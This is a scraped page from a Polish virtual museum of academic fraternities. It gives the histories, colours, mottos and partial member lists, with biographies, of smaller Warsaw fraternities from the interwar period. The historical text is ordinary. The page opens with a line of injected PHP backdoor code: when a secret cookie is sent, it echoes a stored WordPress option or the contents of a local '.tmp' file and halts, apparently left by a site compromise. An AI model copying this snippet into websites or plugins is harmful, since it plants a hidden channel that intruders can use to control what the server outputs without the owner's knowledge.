if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Pozostałe

W wirtualnym Muzeum Polskich Korporacji Akademickich zaprezentowano w formie osobnych opracowań historię oraz stan członkowski 30 korporacji warszawskich. Stanowiły one niemal wszystkie znaczące korporacje funkcjonujących w owym czasie w Warszawie. Na temat pozostałych związków wiadomo mniej. Można mieć nadzieję, że w miarę powiększania zbiorów Archiwum Korporacyjnego także te korporacje doczekają się osobnych opracowań na stronie. Tymczasem już teraz krótko zaprezentowana zostanie większość z nich.

Poniższe, zazwyczaj fragmentaryczne listy członków mniejszych korporacji warszawskich obejmują najczęściej zaledwie kilka bądź kilkanaście nazwisk. Będziemy wdzięczni za ich uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samych korporacjach (vide Poszukiwania).

I. Lechia

Data powstania: 1902 r.
Barwy: zielona – biała – amarantowa
Dewiza: “Jednością silni”

Rys historyczny

Odznaka Lechii wybita z okazji 30-lecia organizacji, 1932 r.

Lechia była najstarszą korporacją powstałą w Warszawie. Została założona w 1902 r. Skupiała studentów Szkoły Mechaniczno-Technicznej H. Wawelberga i S. Rotwanda.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 10 nazwisk.

Lista członków

 1. Balcerski Roman, akt. 1917
 2. Władysław Frycz,
 3. Kazimierz Goliszewski,
 4. Gustaw Hornziel,
 5. Cyprian Jurewicz,
 6. Roman Lipski,
 7. Zygmunt Moraczewski,
 8. Stefan Przeradzki,
 9. Jerzy Junosza-Szaniawski,
 10. Ludwik Uzarowicz,
 11. W. Warda, prezes sem. zim. 1937/38

Legitymacja Romana Balcerskiego, 1917 r.

Opublikowano: 21 IX 2010 r.
Ostatnia zmiana: 17 IX 2017 r.

II. Aquilonia

Data powstania: 9 III 1915 r.
Barwy: błękitna – biała
Dewiza: ?

Rys historyczny

Aquilonia została założona dnia 9 III 1915 r. przez grupę 11 studentów Kursów Przemysłowo-Rolniczych prof. J. Mikułowskiego-Pomorskiego (późniejsza Szkoła Główna Gospodarstwa Wiejskiego). Jednak po wkroczeniu wojsk niemieckich do Warszawy latem 1915 r. działalność stowarzyszenia zamarła. Kilka lat po wojnie członkowie korporacji nawiązali kontakty z powstałą w 1921 r., niezależnie od poprzedniczki, Polską Korporacją Akademicką Aquilonia. Na komersie w dniu 12 II 1925 r. doszło do podpisania aktu unifikacji obu korporacji.

Lista członków pierwszej Aquilonii z 1915 r. znajduje się w zbiorczym zestawieniu w części poświęconej drugiej Aquilonii.

III. Korporacja Studentów i Absolwentów Wyższej Szkoły Handlowej w Warszawie p.n. “Bandera”

Data powstania: 1920 r.
Barwy: zielono-biało-oliwkowe
Dewiza: “Myśl realnie o ideałach”

Rys historyczny

Bandera była ewenementem. Jest jedyną znaną polską korporacją koedukacyjną w dwudziestoleciu międzywojennym. Skupiała studentów i studentki Wyższej Szkoły Handlowej. Za cel stawiała sobie przygotowanie “ze swych członków zwartego zastępu obywateli, którzy pracę zawodową w w dziedzinie gospodarczej będą uważali za środek walki o uniezależnienie ekonomiczne Polski, jako najważniejszej rękojmi jej niepodległego bytu politycznego i zasadniczy kierunek jej potęgi” (Art. 2 pkt d Statutu).

Godłem Korporacji był statek handlowy z rozwiniętymi żaglami.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 34 nazwiska. Wiadomo jednak, że była liczebną korporacją. W 1922 r. liczyła 60 członków, a w latach 30-tych 53 członków

Lista członków

 1. Stefan Bieńkowski
 2. Stanisław Bachórzewski
 3. Janusz Dębicki
 4. Zdzisław Domański
 5. Bogusław Dziarczykowski
 6. Henryk Grinpeld (Zieleziński ?)
 7. Stefan Guirard
 8. Ignacy Gutowski
 9. Tadeusz Gawle, po wojnie w Stanach Zjednoczonych
 10. Adam Hulanicki
 11. Stanisław Izdebski
 12. Ali Klin
 13. Tadeusz Krakowka
 14. Artur Kludt
 15. Julian Kuszel (Knuszel)
 16. Wacław Łagodziński
 17. Stanisław Monsior
 18. Jan Niziński
 19. Bolesław Nowacki
  Stanisław Oleński, ok. 1927 r.

 20. Stanisław Oleński, (23 listopada 1908 w miejsc. Pustynia k. Dębicy w pow. ropczyckim - 20 marca 1990 w Warszawie) s. Juliusza (nauczyciela) i Józefy z d. Inger, absolwent Państwowego Gimnazjum im Króla Władysław Jagiełły w Dębicy), student WSH 1927-30 (dyplom 1933), od 1930 kierownik referatu w GUS, od 1932 w Banku Gospodarstwa Krajowego, od 1937 w Związku Polskich Hut Żelaza w Warszawie, od 1938 kierownik Wydziału Ekonomiczno-Statystycznego w Naczelnej Organizacji Hutnictwa Żelaznego w Warszawie, od 1939 do dekonspiracji w 1942 lub 1943 członek zarządu firmy „Dom Handlowy Jan Chodorowski i S-ka” w Warszawie, którą stworzył z kolegami z Korporacji Bandera, a także prowadził z kolegą z Bandery Bolesławem Rutkowskim sklep przy ul. Rynkowej w Warszawie, w tym czasie współpracował ze Związkiem Odwetu ZWZ w zakresie dostawy materiałów używanych w akcjach sabotażowych, od 1945 kierownik wydziału, a następnie dyrektor ekonomiczny Centralnego Zarządu Przemysłu Hutniczego w Katowicach, od 1958 dyrektor ekonomiczny Zjednoczenia Hutnictwa Żelaza i Stali w Katowicach, od 1961 dyrektor ekonomiczny Zjednoczenie Przemysłu Kabli i Sprzętu Elektrotechnicznego w Warszawie, 1966-72 dyrektor ekonomiczny Zjednoczenia Budowy Maszyn Ciężkich „ZEMAK” w Warszawie, tam też krótko pracował będąc już na emeryturze, podczas pracy w hutnictwie wykładowca Wyższej Szkoły Ekonomicznej w Katowicach, przed wojną i po wojnie wiceprezes Stowarzyszenia Absolwentów SGH/SGPiS, członek Polskiego Towarzystwa Ekonomicznego, odznaczony Złotym Krzyżem Zasługi i Krzyżem Kawalerskim OOP, pochowany na Cmentarzu Bródnowskim (kw. C-16) [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Jana Oleńskiego]

 21. Edward Pawłowski
 22. Józef Perkowski
 23. Czesław Piasecki
 24. Rudolf Pituch
 25. Zygmunt Rakowicz

  Bolesław Rutkowski, 1935 r.

 26. Bolesław Rutkowski, prezes Bandery w latach 20-tych, kierownik Departamentu Przemysłu i Handlu Delegatury Rządu na Kraj

 27. Mieczysław Smerek, (21 stycznia 1901 we Lwowie - 16 marca 1966) s. Piotra (zecera) i Józefy z d. Bieleckiej, uczeń II Szkoły Realnej, od 1917 w konspiracji w kompanii studenckiej POW, walczył w obronie Lwowa, m.in. wziął udział w walkach o radiostację w Kozielnikach, ranny, dostał się do ukraińskiej niewoli, z powodu gangreny stracił rękę, uwolniony z obozu jenieckiego przez WP 28 maja 1919, zdał maturę i rozpoczął studia na WSH, które formalnie ukończył w 1931, ochotnik w wojnie bolszewickiej, ze względu na brak ręki trafił do oddziału bojowo-wywiadowczego Związku Obrony Ojczyzny przy II Oddziale Dowództwa Armii Południowej, w 1921 jako ochotnik w III Powstaniu Śląskim, walczył jako dowódca oddziału telefonicznego III baterii 1 Dywizjonu Artylerii Górnośląskiej, pracownik katowickiego oddziału Banku Przemysłowców 1922-23, a od 1925 w Banku Ziemian, gdzie awansował na stanowiska sekretarza banku we Lwowie, studiował w Instytut des Hautes Etudes Internationales w Paryżu, później pracownik GUS, od 1932 prokurent w Banku Gospodarstwa Krajowego, zastępca komendanta OPL w rejonie Żoliborza, działał w konspiracji ps. „Czcibór”, głównie wśród członków korporacji Bandera, od 1940 mieszkał z żoną w Legionowie, gdzie prowadził działania konspiracyjne (nasłuch radiowy, wydawanie, redagowanie i kolportaż prasy podziemnej m.in. „Ostatnie Wiadomości” oraz „Reduta”, stworzył tajne archiwum prasy podziemnej, został adiutantem dowódcy I Legionowskiego Batalionu AK w czasie powstania warszawskiego (Legionowo było jedynym podwarszawskim miastem, gdzie także wybuchło powstanie), we wrześniu 1944 przeprawił się przez Wisłę i dołączył do Zgrupowania AK „Kampinos”, awansowany do stopnia porucznika, walczył pod Jaktorowem, a następnie z rozbitków zebrał pododdział w sile kampanii i przeprowadził go w Góry Świętokrzyskie, gdzie 11 października 1944 zdał dowodzenie, 1946-47 zastępca dyrektora Departamentu Ekonomicznego Ministerstwa Rolnictwa, po ucieczce S. Mikołajczyka z Polski zwolniony, w 1948 przekazał archiwum konspiracyjne Bibliotece Narodowej, Centralnym Zarządzie Aptek Ministerstwa Zdrowia, od od drugiej połowy lat 50. w Instytucie Drobnego Przemysłu i Rzemiosła, był dyrektorem d/s szkoleń w Polskim Towarzystwie Ekonomicznym, od 1965 na rencie, a krótko potem zmarł, pochowany na warszawskich Powązkach, odznaczony m.in. orderem Virtuti Militari, Krzyżem Obrońców Lwowa, Odznaką Orląt Lwowskich, Krzyżem POW, Krzyżem Niepodległości i Krzyżem Walecznych, jedna z ulic w Legionowie nosi jego imię [Źródła: A. Kaczyński, Mieczysław Smerek - lwowiak w Legionowie czyli losy niezwykłego żołnierza, „Kurier Galicyjski” 1920, nr 22 (362), s. 18-19]

 28. Tadeusz Strzembosz
 29. Władysław Szumilas
 30. Edward Szczepański, po wojnie w Wielkiej Brytanii
 31. Bogdan Tuszyński
 32. Stefan Utanowicz (Ułanowicz)
 33. Rudolf Witemberg, po wojnie w Niemczech
 34. Marcin R. Wyczałkowski, (1910-2008) przed studiami robotnik drogowy, później grawer i litograf, jednocześnie uczęszczał na kursy maturalne, student ekonomii SGH, działacz Legionu Młodych (z którego został usunięty), asystent w Katedrze Ekonomii Politycznej SGH, po doktoracie odbył studia podyplomowe w London School of Economics, w czasie okupacji wykładowca w tzw. Szkole Lipskiego (konspiracyjna SGH), po wojnie naczelnik Wydziału Ekonomicznego NBP, red. miesięcznika “Wiadomości Narodowego Banku Polskiego”, równolegle rektor SGH, jako senior advisor pracownik Międzynarodowego Funduszu Walutowego, autor “Życie człowieka kontrowersyjnego” (Warszawa 2004) [Źródła: P. Tomaszewski, Polskie korporacje akademickie w latach 1918-1939, Toruń 2011, s. 174 i n.]

Święto Korporacji, siedzi piąty od lewej Bolesław Rutkowski, w pierwszym rzędzie stoi siódmy od lewej Stanisław Oleński, 1935 r.

Ostatnia zmiana: 22 XII 2021 r.

IV. Akademicka Korporacja Syjonistyczna Aurora

Data powstania: 1921 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Aurora powstała w 1921 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

Całkowita ustalona, imienna lista członków obejmuje tylko jedno nazwisko.

Lista członków

 1. Dawid Fajgenberg, dr, prezes Związku Filistrów Żydowskich Korporacji Syjonistycznych w Polsce 1933

V. Akademicka Korporacja Syjonistyczna Zelotia

Data powstania: 1921 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Zelotia powstała w 1921 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

Całkowita ustalona, imienna lista członków objemuje tylko trzy nazwiska.

Lista członków

 1. Bialer, mgr, zastępca prezesa Związku Filistrów Żydowskich Korporacji Syjonistycznych w Polsce w 1933
 2. F. Krischwoth, zastępca prezesa Związku Akademickich Zrzeszeń Korporacji Syjonistycznych 1930
 3. Alfred Munz, prezes Związku Akademickich Zrzeszeń Korporacji Syjonistycznych 1930
 4. Adam Schaff, (10 marca 1913 we Lwowie - 12 listopada 2006 w Warszawie) polski filozof pochodzenia żydowskiego, członek KC PPR, ukończył studia, doktorat i hablitację na Uniwersytecie Moskiewskim, kierownik polskiego zespołu Radia Moskwa 1944-46, założyciel 1949 i kierownik 1949-54 Instytutu Kształcenia Kadr Naukowych, od 1954 kierownik Instytutu Nauk Społecznych przy KC PZPR, kierownik Wyższej Szkoły Nauk Społecznych przy KC PZPR 1957-68, kierownik Instytutu Filozofii i Socjologii PAN 1956-68, uważany za głównego i oficjalnego ideologa PZPR, w 1968 w ramach nagonki antysemickiej usunięty z KC PZPR
 5. E. Taube, dr

VI. Wandea

Data powstania: 14 I 1922 r.
Barwy: ciemnomalinowa – biała – pomarańczowa
Dewiza: „Pro Patria et studio” („Dla Ojczyzny i nauki”)

Rys historyczny

Czarna kawa Wandei, Warszawa 1930 r.

Wandea powstała dnia 14 I 1922 r. Dnia 12 XII 1927 r. została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 12 XII 1927 r.). Kandydowała pod opieką K! Aquilonia. Prawa członka rzeczywistego uzyskała dnia 15 VII 1929 r. W 1931 r. istniał Związek Filistrów. W konsekwencji “reform” jędrzejewiczowskich po 1933 r. zanikła.

Siedziby korporacji mieściły się: w roku akademickim 1927/28 przy ul. Marszałkowskiej 19/30, w latach 1928-30 przy ul. Kruczej 7/3, w 1930/31 przy ul. Chłodnej 41/11, w 1931/32 przy ul. Kruczej 7/4, a w 1932/33 przy ul. Tamka 46.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 43 nazwiska, w tym jednego członka honorowego.

Lista członków

Członkowie honorowi

 1. Kazimierz Kopystyński, ( - 28 grudnia 1929) Filister honorowy Wandei

Członkowie rzeczywiści

 1. Stefan Bielicki, student UW, c. 1932, akt. 1932-33
 2. Antoni Bojarski, student PW, akt. 1927-33
 3. Edward Chaczyński, student PW, c. 1932, akt. 1932-33
 4. Wacław Czerwonko, student WSH, c. 1930/31, akt. 1930/31-33
 5. Stanisław Chodkiewicz, student PW, c. 1927/28, akt. 1927/28
 6. Włodzimierz Doroszewski, student PW, akt. 1927-33, olderman sem. let. 1929/30
 7. Stanisław Frentzel,
 8. Zygmunt Gołębiowski, student PW, akt. 1927-29
 9. Witold Kawęcki, student UW, c. 1932, akt. 1932-33
 10. Stefan Komosiński, student UW, c. 1929/30, akt. 1929/30-33
 11. Miron Królikowski, student WSH, c. 1929/30, akt. 1929/30-32
 12. Longin Kurski, student PW, akt. 1927-29
 13. Tadeusz Kurski, student SNP, c. 1931/32, akt. 1931/32-33
 14. Adam Mickiewicz, student WSH, c. 1927/28, akt. 1927/28-32, sekretarz sem. let. 1928/29, prezes sem. let. 1929/30, wiceprezes sem. let. 1930/31, członek red. “Wiadomości Korporacyjnych” 1930
 15. Eugeniusz Mikitko (Mykitka), student PW, c. 1931/32, akt. 1931/32-33, sekretarz sem. zim. 1932/33
 16. Zdzisław Mróz, student PW, akt. 1927-31
 17. Kazimierz Nowca, student SGGW, akt. 1927-33
 18. Henryk Orzechowski, student UW, akt. 1927-33
 19. Władysław Piasecki, student UW, c. 1929/30, akt. 1929/30-33, sekretarz sem. zim. 1930/31
 20. Eugeniusz Piontek, student UW, akt. 1927-33
 21. Kazimierz Piontek, student UW, akt. 1927-31
 22. Józef Piskorz-Nałęcki, student PW, c. 1927/28, akt. 1927/28-29
 23. Roman Pluciński, student UW, c. 1930/31, akt. 1930/31-33
 24. Antoni Pogu-Mirski, ( - 1944 w Warszawie) student PW, akt. 1927-33, olderman sem. let. 1928/29, olderman sem. zim. 1930/31 i sem. zim. 1931/32, zginął w Powstaniu Warszawskim
 25. Juljusz Popowicz, student UW, od 1931 PW, c. 1930/31, akt. 1930/31-33, wiceprezes sem. zim. 1932/33
 26. Stefan Przedpełski, student UW, c. 1929/30, akt. 1929/30-33, wiceprezes sem. zim. 1931/32, olderman sem. zim. 1932/33
 27. Antoni Rakowski, student WSH, akt. 1927-33, wiceprezes sem. let. 1927/28, wiceprezes sem. let. 1928/29 i sem. let. 1929/30
 28. Kazimierz Rakowski, student UW, od 1930 student SGGW, akt. 1927-33, wiceolderman sem. let. 1929/30
 29. Feliks Reszuta, student WSH, akt. 1927-33
 30. Wacław Rosłoniec, student WSH, c. 1932, akt. 1932-33
 31. Kazimierz Smoliński, student PW, akt. 1927-33, skarbnik sem. let. 1929/30, prezes sem. zim. 1931/32
 32. Władysław Smoszyński, student UW, akt. 1927-33, prezes sem. let. 1927/28
 33. Dobrosław Sobieraj, student WSH, c. 1929/30, akt. 1929/30-33
 34. Jan Suchcicki, student UW, c. 1932, akt. 1932-33
 35. Jan Szczawiński, student WSH, akt. 1927-31, sekretarz sem. let. 1927/28, prezes sem. let. 1928/29, prezes sem. zim. 1930/31
 36. Kazimierz Świdziński, prawd. brat Ludwika (Wandea), student PW, c. 1928/29, akt. 1928/29-33, sekretarz sem. let. 1929/30
 37. Ludwik Świdziński, prawd. brat Kazimierza (Wandea), student PW, c. 1928/29, akt. 1928/29-33
 38. Wiktor Tadeusiak, student UW, c. 1929/30, akt. 1929/30-33
 39. Władysław Trzciński, student WSH, akt. 1927-33, prezes sem. zim. 1932/33
 40. Eugeniusz Wyszohorski, student PW, sekretarz sem. zim. 1931/32
 41. Eugeniusz Zając, student PW, c. 1930/31, akt. 1930/31
 42. Władysław Ziarek, student WWP, akt. 1927-29

VII. Virtutia

Data powstania: 29 I 1922 r.
Barwy: ciemnozielona – srebrna – fioletowa
Dewiza: „Życie Ojczyźnie, Honor - nikomu”

Rys historyczny

Korporacja została założona dnia 29 I 1922 r. przez grupę słuchaczy Państwowej Szkoły Leśnej (?). Początkowo nosiła nazwy “Philadelphia” oraz “Polonia” Od 1925 r. już pod nazwą Virtutia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 24 VI 1925 r.). Kandydowała pod opieką K! Welecja. Prawa członka rzeczywistego uzyskała dnia 7 V 1927 r. W 1928 r. istniał Związek Filistrów. Po 1929 r. najprawdopodobniej zanikła.

Kuratorem z ramienia uniwersyteckiego Senatu był prof. Ignacy Koschembahr-Łyskowski. Siedziby korporacji mieściły się: w roku akademickim 1925/26 w Moście Poniatowskiego (strona prawa 2-ie zejście), a w latach 1927-29 przy ul. Wilczej 23/8.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 27 nazwisk.

Lista członków

 1. Józef Antoszewicz, student WSH, akt. 1925-29, wiceprezes sem. let. 1927/28
 2. Wiktor Ber, student UP (?), akt. 1925-29
 3. Stefan Blutstein, student WSH, akt. 1925-29
 4. Wiktor Budzyński, student SGGW, akt. 1925-29
 5. Józef Dawid, student UW, akt. 1925-29
 6. Józef Dąbrowski, student UW, akt. 1925-29
 7. Stanisław Dobrzyński, student WSH, akt. 1925-29
 8. Marjan Frajman, akt. 1928-29
 9. Felicjan Gdyk, akt. 1928-29
 10. Jan Komosiński, student UW, akt. 1925-29
 11. Ryszard Karpiński, (?), lekarz

  Antoni Krauze, prawd. 1938 r.

 12. Antoni Krauze, (25 maja 1903 w Sierpuchowie w Rosji - 12 maja 1975 w Warszawie), s. Eugeniusza Mariana i Heleny z Balisińskich, brat Kazimierza i Wiktora (obaj Lechicja) oraz Eugeniusza (Virtutia), student prawa i ekonomii, akt. 1928-29, przed i w czasie wojny dyrektor administracyjny Instytutu Przemyslu Fermentacyjnego w Warszawie, w czasie wojny Instytut byl terenem pracy konspiracyjnej, punktem informacji i kolportazu prasy podziemnej oraz tajnego nauczania, po wojnie doradca prawny warszawskich rzemieslników, pochowany na Cmentarzu na Wawrzyszewie w Warszawie [Źródła (poza wskazanymi poniżej spisu członków): relacja Zbigniewa Krauze]

  Eugeniusz Krauze, 1927 r.

 13. Eugeniusz Krauze, (9 marca 1902 w Sierpuchowie w Rosji - 20 lutego 1945 w Litomierzycach) s. Eugeniusza Mariana i Heleny z Balisińskich, brat Kazimierza i Wiktora (obaj Lechicja) oraz Antoniego (Virtutia), absolwent VII Filologicznego Gimnazjum Warszawskiego, student Wydziału Finansowo-Ekonomicznego Szkoły Nauk Politycznych i UW (?), inż. (?), wiceprezes sem. let. 1928/29 (jako filister), po studiach pracował w Nadleśnictwie Dóbr Staszowskich, w Głównym Urzędzie Statystycznym w Warszawie, a następnie w dyrekcji Państwowego Monopolu Spirytusoweg w Warszawie, we wrześniu 1944 wywieziony do obozu w Oświęcimiu transportem ludnosci cywilnej, a następnie po kilku dniach przewieziony do obozu w Litomierzycych, gdzie zginął [Źródła (poza wskazanymi poniżej spisu członków): relacja Zbigniewa Krauze]

 14. Stanisław Błażej Lech, student UW, akt. 1925-29, prezes sem. let. 1925/26
 15. Eugeniusz Lewański, student PW, akt. 1925-29, sekretarz sem. let. 1928/29, inż.
 16. Janusz Nowacki, student UW, akt. 1925-29
 17. Jan Nowakowski, student UW, akt. 1925-29
 18. Wacław Osiński, (1902-1972) student UW, akt. 1925-29, mgr praw, adwokat
 19. Bogusław Przygodzki, student WSH< akt. 1925-29
 20. Tadeusz Różycki, akt. 1925-29
 21. Marjan Smykiewicz, student UW, akt. 1925-29
 22. Piotr Staszałek, student UP (?), akt. 1925-29, sekretarz sem. let. 1925/26, sekretarz sem let. 1927/28
 23. Jerzy Sawiczewski, student UW, akt. 1925-29, wiceprezes sem. let. 1925/26, prezes sem. let. 1927/28, prezes sem. let. 1928/29
 24. Kazimierz Szubiński, akt. 1925-26
 25. Włodzimierz Szust, student UP, akt. 1925-29
 26. Edward Wiche, akt. 1928-29
 27. Teodor Żegliński, student UP, akt. 1925-28

VIII. Carpatia

Data powstania: luty 1922 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Carpatia powstała w lutym 1922 r. W 1923 r. wraz z K! Nationalitas oraz K! Victoria (vide infra) stworzyła związek międzykorporacyjny o charakterze “narodowo-państwowym” - Konwent Polskich Korporacji Akademickich. Przez krótki czas od dnia 6 VII 1930 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 6 VII 1930 r.). Wystąpiła przed dniem 11 XI 1930 r., a w 1932/33 r. przystąpiła do sanacyjnej Federacji Polskich Korporacji Akademickich. Prawdopodobnie zanikła w drugiej połowie lat 30-tych.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje dwa nazwiska.

Lista członków

 1. Antoni Ludwik Malatyński, autor kodeksu honorowego, reprezentant Związku Postępowo-Narodowego na Zjeździe Ogólnoakademickim w 1925 r.
 2. Kazimierz Milej, po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, prezes 1972-74, skarbnik 1978-79

IX. Mazowia

Data powstania: 1922 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Mazowia powstała w 1922 r. Istniała przynajmniej do 1925 r.

X. Slavia

Data powstania: styczeń 1923 r. (1922 r. ?)
Barwy: ?
Dewiza: ?

Rys historyczny

Slavia powstała w styczniu 1923 r. Już maju 1923 r. doszło do rozłamu w Korporacji, w wyniku którego powstała K! Filalethea. Dwa lata później w wyniku kolejnego rozłamu powstała K! Filomatia Varsoviensis. Mimo trudności Slavia istniała nadal. W 1932 r. była współzałożycielem sanacyjnej Federacji Polskich Korporacji Akademickich.

XI. Filalethea

Data powstania: maj 1923 r.
Barwy: ciemnozielona – seledynowa – złota
Dewiza: „Semper surgere”

Rys historyczny

Filalethea powstała w maju 1923 r. w wyniku rozłamu w K! Slavia. Od dnia 13 XI 1927 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 27 X 1927 r.). Kandydowała pod opieką K! Patria. Prawa członka rzeczywistego Związku uzyskała dnia 8 XII 1930 r. Po 1932 r. najprawdopodobniej zanikła.

Siedziba korporacji w latach 1927-32 mieściła się na Rynku Starego Miasta 31.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 34 nazwiska.

Lista członków

 1. Edward Banaszkiewicz, student WWP, akt. 1927-32, sekretarz sem. let. 1927/28 oraz sem. let. 1928/29
 2. Henryk Baranowski, student UW, c. 1927/28, akt. 1927/28-32, sekretarz sem. zim. 1931/32
 3. Stefan Biernacki, student UW, akt. 1927-32
 4. Zygmunt Bieryłło, student SNP, c. 1930/31, akt. 1930/31-32
 5. Jan Cerański, student WSH, akt. 1927-32
 6. Mieczysław Cerański, student UW, od 1930 student PID, akt. c. 1927/28-32
 7. Stanisław Derliński, student UW, c. 1931/32, akt. 1931/32
 8. Zygmunt Dworakowski, student UW, akt. 1928-30, prezes sem. let. 1927/28 oraz sem. let. 1928/29, olderman sem. let. 1929/30, sem. zim. 1930/31, sem. zim. 1931/32
 9. Ludwik Ekiel, student UW, akt. 1927-32
 10. Feliks Esse, (1906? - 1978/79) student PW, akt. 1927-31, prezes sem. let. 1929/30 i sem. zim. 1930/31, prof. AGH, specjalista z zakresu ceramiki
 11. Karol Flesiński, student WWP, akt. 1927-32
 12. Stanisław Gabarski, student UW, akt. 1927-32
 13. Mieczysław Gaworski, student UW, akt. 1927-32
 14. Feliks Gendek, student WWP, akt. 1928-32
 15. Henryk Jakóbowski (Jakubowski), student WSH, c. 1930/31, akt. 1930/31-32
 16. Wacław Komornicki, student UW, akt. 1927-28
 17. Mieczysław Kulesza, student UW, akt. 1927-29
 18. Ryszard Kwiatkowski, student PW, c. 1928/29, akt. 1928/29-32, sekretarz sem. let. 1929/30 i sem. zim. 1930/31, prezes sem. zim. 1931/32
 19. Mieczysław Łopiński, student UW, c. 1928/29, akt. 1928/29-32
 20. Henryk Markiewicz, student UW, akt. 1927-32
 21. Tadeusz Misiarek, student WSH, akt. 1927-32
 22. Stefan Pindelski, student PW, akt. 1927-30
 23. Czesław Politowski, student UW, od 1929 SGGW, c. 1928/29, akt. 1928/29-32
 24. Wacław Pomorski, student UW, akt. 1927-29
 25. Adam Pussty, student WSH, akt. 1927-32
 26. Jan Reda, student PW, akt. 1927-31
 27. Wiktor Rejnsz, student WWP, akt. 1927-32
 28. Tomasz Rogoziński, student WWP, akt. 1927-32, wiceprezes sem. let. 1927/28, sem. let. 1928/29, sem. let. 1929/30 i sem. zim. 1930/31
 29. Eugeniusz Ryszkowski, student UW, akt. 1927-32
 30. Józef Rzędowski, student UW, c. 1927/28, akt. 1927/28-31
 31. Antoni Stradowski, student UW, akt. 1927-30
 32. Andrzej Śmiarowski, student WWP, od 1929 WSH, od 1930 UW, akt. 1927-31, olderman sem. let. 1927/2 oraz sem. let. 1928/29, wiceprezes sem. zim. 1931/32
 33. Zygmunt Śmietański, student UW, akt. 1927-29
 34. Wacław Trochimczuk, student WSH, akt. 1927-32

XII. Victoria

Data powstania: przed końcem 1923 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Victoria skupiała studentów Wolnej Wszechnicy Polskiej. Obok K! Nationalitas oraz K! Carpatia w końcu 1923 r. stworzyła związek międzykorporacyjny o charakterze “narodowo-państwowym” - Konwent Polskich Korporacji Akademickich. Istniała przynajmniej do 1925 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje trzy nazwiska.

Lista członków

 1. Jan Broszkiewicz, skarbnik Konwentu Polskich Korporacji Akademickich 1923-24
 2. Roman Gissing, sekretarz Konwentu Polskich Korporacji Akademickich 1923-24
 3. Olgierd Gorzkowski, I wiceprezes Konwentu Polskich Korporacji Akademickich 1923-24

XIII. Akademicka Korporacja Syjonistyczna Betharia

Data powstania: 1923 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Betharia powstała w 1923 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje trzy nazwiska.

Lista członków

 1. S. Gattman, zastępca prezesa Związku Akademickich Zrzeszeń Korporacji Syjonistycznych 1930
 2. B. Grossman, mgr, zastępca prezesa Związku Filistrów Żydowskich Korporacji Syjonistycznych w Polsce 1933
 3. Łucjan Sudowicz, zastępca prezesa Związku Akademickich Zrzeszeń Korporacji Syjonistycznych 1930

XIV. Legetia

Data powstania: przed czerwcem 1924 r.
Barwy: szafirowa – złota – zielona
Dewiza: „Suum cuique” („Każdemu, co mu się należy”)

Rys historyczny

Od dnia 29 maja 1924 r. Legetia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 29 V 1924 r.). Kandydowała pod opieką K! Welecja. W semestrze zimowym roku akademickiego 1926/27 przekształciła się w Związek Filistrów. Na mocy uchwały Rady Naczelnej Związku z czerwca 1927 r. została uznana za korporację nadzwyczajną. Brak danych o dalszej działalności Legetii.

Siedziba korporacji w roku akademickim 1925/26 mieściła się przy ul. Marszałkowskiej 149 (lokal Koła Młodych Ziemianek).

Całkowita ustalona, niekompletna imienna lista członków obejmuje 22 nazwiska.

Lista członków

  Henryk Bolechowski, 1930 r.

 1. Henryk Bolechowski, (30 listopada 1902 w Złotej pow. Sochaczew - 2 maja 1954 w Warszawie) s. Władysława i Izabelli z Garbolewskich, brat Stefana (Legetia), student i absolwent - inż. rolnik 1928 Wydziału Rolniczego SGGW, akt. 1924-26, ziemianin, gospodarował w maj. Złota pow Sochaczew, żołnierz PSZ na Zachodzie (w oddziałach gen. Stanisława Maczka)

  Stefan Bolechowski, 1952 r.

 2. Stefan Bolechowski, (16 lutego 1904 - 25 marca 1953 w Warszawie) s. Władysława i Izabelli z Garbolewskich, brat Henryka (Legetia), absolwent Gimnazjum Wojciecha Górskiego 1922, student prawa UW 1922-25, akt. 1924-26, absolwent Szkoły Podchorążych Artylerii we Włodzimierzu Wołyńskim 1926, ppor. rez., w 1937 awansowny na por. rez., urzędnik, od 1931 administrator nieruchomości miejskich w Warszawie, żołnierz wojny obronnej 1939, dowódca Składu Towarowego pociągu pancernego nr 62 który walczył na trasie Mrozy-Brześć, uczestnik obrony Warszawy, w grudniu 1939 aresztowany i wywiziony do obozu jenieckiego, jeniec oflagów Norymberga, Laufen, Arnswalde, Woldenberg, Pranzlau i Schverin, od grudnia 1945 komendant Obozu Cywilnego Jägerslust dla wracających do kraju więźniów niemieckich, a następnie kierownik administracyjny szpitala dla chorych na płuca w Glückstadt oraz pracownik Konsulatu RP w Hamburgu, do kraju wrócił w 1950, zmarł na atak serca

 3. Józef Celiński, akt. 1924-26, prezes sem. zim. 1924/25, wiceprezes sem. let. 1925/26
